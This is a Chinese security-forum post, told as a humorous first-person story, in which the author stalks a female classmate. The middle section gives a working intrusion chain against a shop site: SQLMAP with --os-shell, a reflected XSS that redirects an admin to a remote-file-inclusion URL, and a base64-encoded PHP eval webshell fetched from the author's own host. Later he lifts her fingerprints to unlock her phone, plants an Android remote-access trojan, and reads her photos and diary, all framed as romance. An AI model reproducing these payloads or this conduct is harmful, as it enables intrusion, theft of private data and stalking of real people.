本文來自i春秋作者:gh0stkey

-=--=--=--=--=--=--=--=--=--=--=--=-
時間:早上8點02分(洛杉磯時間)
作者:gh0stkey(米斯特安全團隊核心)
-=--=--=--=--=--=--=--=--=--=--=--=-

文章前介:

主角:gh0stkey本人(化名:key)、國外留學學生(妹子)

導火線:帶有印子的紙條

文章導讀:

一張神秘的紙條出現在主角的生活之中,卻讓主角顛覆了"屌絲"的身份。

紙條模樣還原: 因為當時沒想到要拍照,就借下網圖。

內容簡介:

事情是這樣的,在一個陽光明媚的早晨,Key開始了老套的生活方式(洗臉刷牙..)上學去了。 ...中間省略上課不聽講的趣事。 只聽"叮鈴鈴"的下課鈴,Key跟往常一樣走出教室呼吸下新鮮的空氣,可是意外的在走廊上發現了一張紙條。

上面的內容大概是一串數字:1001...(大概就是10這兩個數字重復的使用) Key饒有興趣的看了下,飛快的在大腦中找出了兩種解決思路:二進制 摩斯電碼。

Key再進行思考,發現只有摩斯電碼可行(這樣與之匹配 1=滴 0=嗒 正好學校最近也教過摩斯電碼) 這樣再進行一次轉換(滴=· 嗒=-) 然后對應圖1進行解碼,發現結果居然是個中國的手機號。 出于好奇,Key使用了一個手機號位置定位的系統進行了查詢:

(位置僅供參考而已。)

Key就在想自己班里是不是有一個就是新疆過來的?(其實就是在YY,是男的還是女的)

二話不說就動手把上次備份下來的同學信息檔案調出來:

看到一個叫韓雨的,名字一看,果不其然是個妹子!(到這里Key的"屌絲"氣質就顯露無疑了)

開始進行人肉搜索,這里Key選擇了Google進行搜索,先是搜索了"YuHan"的關鍵詞,其實沒有多少用處(名字太多找不到有用信息)

再進行手機號的搜索發現了一個網站:

居然搜索到了這個,進去了網站瞬間給跳轉到了主頁index.html

有經驗的人就知道這個頁面能被爬到,說明之前存在越權漏洞。

但是到Key開始玩的時候就給修復了,Key頓時臉上就多了幾條黑線。。。

這徹底激發了Key的屌絲之魂,利用了Safe3進行了SQL注入的掃描 結果:

http://****/index.php?shop=17 可能存在SQL注入漏洞

雖然是爆出了可能存在其實使用SQLMAP注入也是可以的: 直接使用正常的語法就注入出來了:

Key看到數據量也是很大的,但并沒有去Dump數據而是選擇了溫柔的方式:--os-shell

可惜的是并沒有權限去執行,無奈,只得繼續挖掘其他的漏洞。

通過一系列的測試挖到了一個XSS反射(這里的挖掘思路無非就是見參數就使用payload插進去然后看返回的信息進行構造):

不過光一個XSS反射沒有什么用,于是Key選擇了代碼審計這款程序,因為是一款開源的商城程序,很快就可以找到。

Key直接使用Tommsearch快速搜索找到后臺一處代碼:

<?php
include($_GET['action']);
....

明眼人直接可以看出來,存在文件包含漏洞。 但是只是后臺,該怎么辦?于是Key就結合了XSS反射漏洞進行:

Key在自己的主機上創建了個文件:1.php內容為:

<?php file_put_contents('key.php',base64_decode('QGV2YWwoJF9QT1NUJiM5MTtrZXkmIzkzOyk7Pz4=')); ?>

然后構建了xss反射的payload:

<script>href.location="/admin/ad.php?action=http://****.top/1.php"</script>

直接跳轉到文件包含那個URL中然后包含Key的1.php文件這樣就可以創建key.php木馬文件了(一句話木馬 也就是1.php的代碼意思)。

流程圖:

這邊利用的商品評價,誘惑下后臺的人。

OK這次滲透就到這里,Key順利的拿下了Webshell:

之后Key得到了妹紙的買賣信息,其中步伐有胸罩購買!!(Key這時鼻血已經流出來了啦)

OK獲取這些之后,Key整理了下文本就關機睡覺等待第二天去撩那個妹子(韓雨)。

。。。

第二天來到的如此之快,再去學校的路上Key碰見了上學以來對自己很照顧的同桌,并且知道了韓雨的模樣(噴血噴血,好漂釀的)

走進了班級,Key東張西望,只見"清爽的頭發,清秀的臉皮,清澈的眼眸",沒錯就是韓雨!

Key以不是很流利的英語跟韓雨打招呼,得來的卻是:“我知道你是中國人,我們可以用中國話溝通的。”

只聽“啪啪啪啪”的響聲,Key被打臉了,很疼

。。。 經過跟妹子的交流,他們的關系似乎在慢慢的拉近,于是相約去吃牛排(這期間細節就不多講,就是撩妹子),由于有事情,妹子先走了。 Key作為一名職業的“屌絲”!隨身攜帶膠帶紙是很有必要的,于是利用膠帶紙小心翼翼的采集了西餐刀上的指紋:

順利的保留下來之后,下面的才是有趣的。 。。。 又是過了幾天,Key由于遲到被留下來罰打掃教室,發現韓雨的抽屜手機沒帶回去。Key試著打開手機可是有密碼,也不知道,懶得用知道的信息做成密碼攻擊字典了,于是就用之前收集好的指紋信息順利的解鎖了手機,并且打開自己的網盤,種下了以前玩的安卓遠控,安然無恙的放回了抽屜中。

。。。 終于,利用木馬,Key有了妹子的正臉照:

Key也偷看了她的日記:

9.12號,今天有點累,閨蜜們都有男朋友安慰,突然覺得有男朋友真好。

這條日記 Key仿佛看到了希望!!

于是Key直接干脆的來了條:
第二天,Key直接當眾表白(這里當然不能少了玫瑰花),結果是成功了!

就這樣Key成功的逆襲了“屌絲”的身份。

原文地址:http://bbs.ichunqiu.com/thread-12136-1-1.html?from=paper

Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/48/